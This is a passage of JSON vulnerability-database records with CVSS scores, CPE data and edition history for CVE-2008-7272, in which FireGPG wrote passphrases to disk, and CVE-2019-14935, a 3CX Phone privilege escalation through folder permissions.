"references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "cvelist": ["CVE-2008-7272"], "type": "cve", "lastseen": "2021-04-21T20:41:43", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T13:59:22", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T13:59:22", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "f6701a04d3477e440e72324b648d7646a2f9466e07e83e341707bb314aec84a0", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "a0acab3127efc281e78e28b6a414532c", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-09-21T13:59:22", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 10}, "differentElements": ["cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T13:59:22"}, {"bulletin": {"affectedSoftware": [{"name": "getfiregpg firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-11T14:25:16", "references": [], "rev": 2}, "score": {"modified": "2020-02-11T14:25:16", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "a5439a88032d0d96d6b3b175c5bb2652a08a5ac9dd8565abd675e989e312c52e", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "c78a0c9b48c95bd2d49fb402de9ce674", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "d2db9f7acf8121ca4d72b70e2934db08", "key": "affectedSoftware"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-02-11T14:25:16", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 10}, "differentElements": ["cvss3", "cpe", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-11T14:25:16"}, {"bulletin": {"affectedSoftware": [{"name": "getfiregpg firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user?s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users?s private key.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-11-15T19:55:37", "references": []}, "score": {"modified": "2019-11-15T19:55:37", "value": 2.4, "vector": "NONE"}}, "hash": "05a389bab8cb239109f07a53e4f0a9c76cc24d31548b23dfad15c1385b48f5a5", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "b0552313c96be75e9ec1c10adb56b096", "key": "modified"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "240c2c1dd6f5cc5cbeb07774547c6c2b", "key": "description"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "c78a0c9b48c95bd2d49fb402de9ce674", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "d2db9f7acf8121ca4d72b70e2934db08", "key": "affectedSoftware"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2019-11-15T19:55:37", "modified": "2019-11-14T14:28:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 2}, "differentElements": ["description", "modified"], "edition": 2, "lastseen": "2019-11-15T19:55:37"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "enchantments": {"dependencies": {"modified": "2021-02-02T05:35:21", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T05:35:21", "rev": 2, "value": 2.4, "vector": "NONE"}}, "extraReferences": [{"name": "https://security-tracker.debian.org/tracker/CVE-2008-7272", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7272"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "refsource": "MISC", "tags": ["Third Party Advisory", "Issue Tracking"], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386"}], "hash": "feff88852d5f44ef4f736cb629de97022a0e3f23b99e0deec3d9ee5daaa7d8df", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "4847e3110691b6a6a4c7664c0f127f70", "key": "extraReferences"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "675695b80d1f3d2196a77047e1ceba64", "key": "cpeConfiguration"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "a0acab3127efc281e78e28b6a414532c", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "immutableFields": [], "lastseen": "2021-02-02T05:35:21", "modified": "2020-02-10T21:16:00", "objectVersion": "1.5", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 19}, "different_elements": ["cpeConfiguration"], "edition": 8, "lastseen": "2021-02-02T05:35:21"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "*"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 6, "enchantments": {"dependencies": {"modified": "2020-11-29T22:56:16", "references": [], "rev": 2}, "score": {"modified": "2020-11-29T22:56:16", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "20ae55db346f6babbeac989b07a5b26e855e45e42cfda6773d64bbcb84e4ef79", "hashmap": [{"hash": "d647e62c83e294ffd6f56a7c761beece", "key": "affectedSoftware"}, {"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "675695b80d1f3d2196a77047e1ceba64", "key": "cpeConfiguration"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-11-29T22:56:16", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 15}, "differentElements": ["affectedSoftware"], "edition": 6, "lastseen": "2020-11-29T22:56:16"}], "edition": 9, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "a0acab3127efc281e78e28b6a414532c"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "77e03828e2d6f83f8fa932acfe8daff3"}, {"key": "cvelist", "hash": "767e67f900c3effb5b550959d21fb12e"}, {"key": "cvss", "hash": "a89198c45ce87f7ec9735a085150b708"}, {"key": "cvss2", "hash": "9bc143c7676b7e5a3fd9537d7507310b"}, {"key": "cvss3", "hash": "cd391b15e7a01ae2bbfcca256d89bfb8"}, {"key": "cwe", "hash": "92c16862fafe4d9eb26185434339836e"}, {"key": "description", "hash": "95669953499c0eb40b242611dfbe75d4"}, {"key": "extraReferences", "hash": "4847e3110691b6a6a4c7664c0f127f70"}, {"key": "href", "hash": "9258b012e591cc93a7c6b0cd1b5c6b05"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "3c75b36a7f1966a251dbe6148b866f97"}, {"key": "published", "hash": "1162e82aa1c980ee7ebee4af4c99369c"}, {"key": "references", "hash": "54b0c94164bf625d039c58f14cd4c116"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "5db042f8057f3f288fe9cd4213121eb2"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "f34f5d089606f7d870ccc28642bf61f774619d905673726848fc15f3a6590575", "viewCount": 25, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-21T20:41:43", "rev": 2}, "score": {"value": 2.4, "vector": "NONE", "modified": "2021-04-21T20:41:43", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cpe23": [], "cwe": ["CWE-312"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "cpe_name": [], "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://security-tracker.debian.org/tracker/CVE-2008-7272", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7272"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "refsource": "MISC", "tags": ["Third Party Advisory", "Issue Tracking"], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386"}], "immutableFields": []}, {"id": "CVE-2019-14935", "bulletinFamily": "NVD", "title": "CVE-2019-14935", "description": "3CX Phone 15 on Windows has insecure permissions on the \"%PROGRAMDATA%\\3CXPhone for Windows\\PhoneApp\" installation directory, allowing Full Control access for Everyone, and leading to privilege escalation because of a StartUp link.", "published": "2019-08-12T00:15:00", "modified": "2020-08-24T17:37:00", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14935", "reporter": "cve@mitre.org", "references": ["https://www.3cx.com/community/threads/security-issue-with-3cx-windows-client-install.64432/"], "cvelist": ["CVE-2019-14935"], "type": "cve", "lastseen": "2021-04-23T00:45:10", "history": [{"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows", "name": "microsoft windows", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "3cx:3cx", "name": "3cx", "operator": "eq", "version": "15"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:3cx:3cx:15"], "cpe23": ["cpe:2.3:a:3cx:3cx:15:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:a:3cx:3cx:15:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2019-14935"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-732"], "description": "3CX Phone 15 on Windows has insecure permissions on the \"%PROGRAMDATA%\\3CXPhone for Windows\\PhoneApp\" installation directory, allowing Full Control access for Everyone, and leading to privilege escalation because of a StartUp link.", "edition": 7, "enchantments": {"dependencies": {"modified": "2021-02-02T07:12:52", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T07:12:52", "rev": 2, "value": 3.7, "vector": "NONE"}}, "extraReferences": [{"name": "https://www.3cx.com/community/threads/security-issue-with-3cx-windows-client-install.64432/", "refsource": "MISC", "tags": ["Vendor Advisory", "Exploit", "Issue Tracking"], "url": "https://www.3cx.com/community/threads/security-issue-with-3cx-windows-client-install.64432/"}], "hash": "0019f616d66ce2cb0fc0d7e98e031c366c9a69ad6dc3dc169de1b9df65925e30", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "e53e0b9d5b911b46159010cf0e76b1e7", "key": "cpeConfiguration"}, {"hash": "a220d441920fbb7fc4645a3a7b89614a", "key": "extraReferences"}, {"hash": "5df0cbc8aa96d0c3a2702b7ed41dfb77", "key": "modified"}, {"hash": "88039703ac505ae878e5beff9adc7f96", "key": "cpe"}, {"hash": "77a06168ea28e330fa0a440746d3f3b3", "key": "cvss3"}, {"hash": "a242dd034660fbf440f6a442af87b48f", "key": "cvelist"}, {"hash": "dbfa267d59d7141a20d4df760c0086b6", "key": "title"}, {"hash": "a4d2cdd0d6aaf6342ed2f033ba700cdf", "key": "published"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6bd2e583c5269d2b0a8fac4a68b21418", "key": "affectedSoftware"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "7ff3550b63dd1e8accb7b7cfae2aac3c", "key": "references"}, {"hash": "aa21135ab2cca3471ef8a445b18f5523", "key": "description"}, {"hash": "e215275426ed1d0424a91c729740ec75", "key": "cpe23"}, {"hash": "45e1e5060da05cd667da52bd496de058", "key": "affectedConfiguration"}, {"hash": "d25ae327664896ff93792d7cd81d7c07", "key": "cwe"}, {"hash": "a2a0222621493f12fcb66b8ac0f2dd01", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14935", "id": "CVE-2019-14935", "immutableFields": [], "lastseen": "2021-02-02T07:12:52", "modified": "2020-08-24T17:37:00", "objectVersion": "1.5", "published": "2019-08-12T00:15:00", "references": 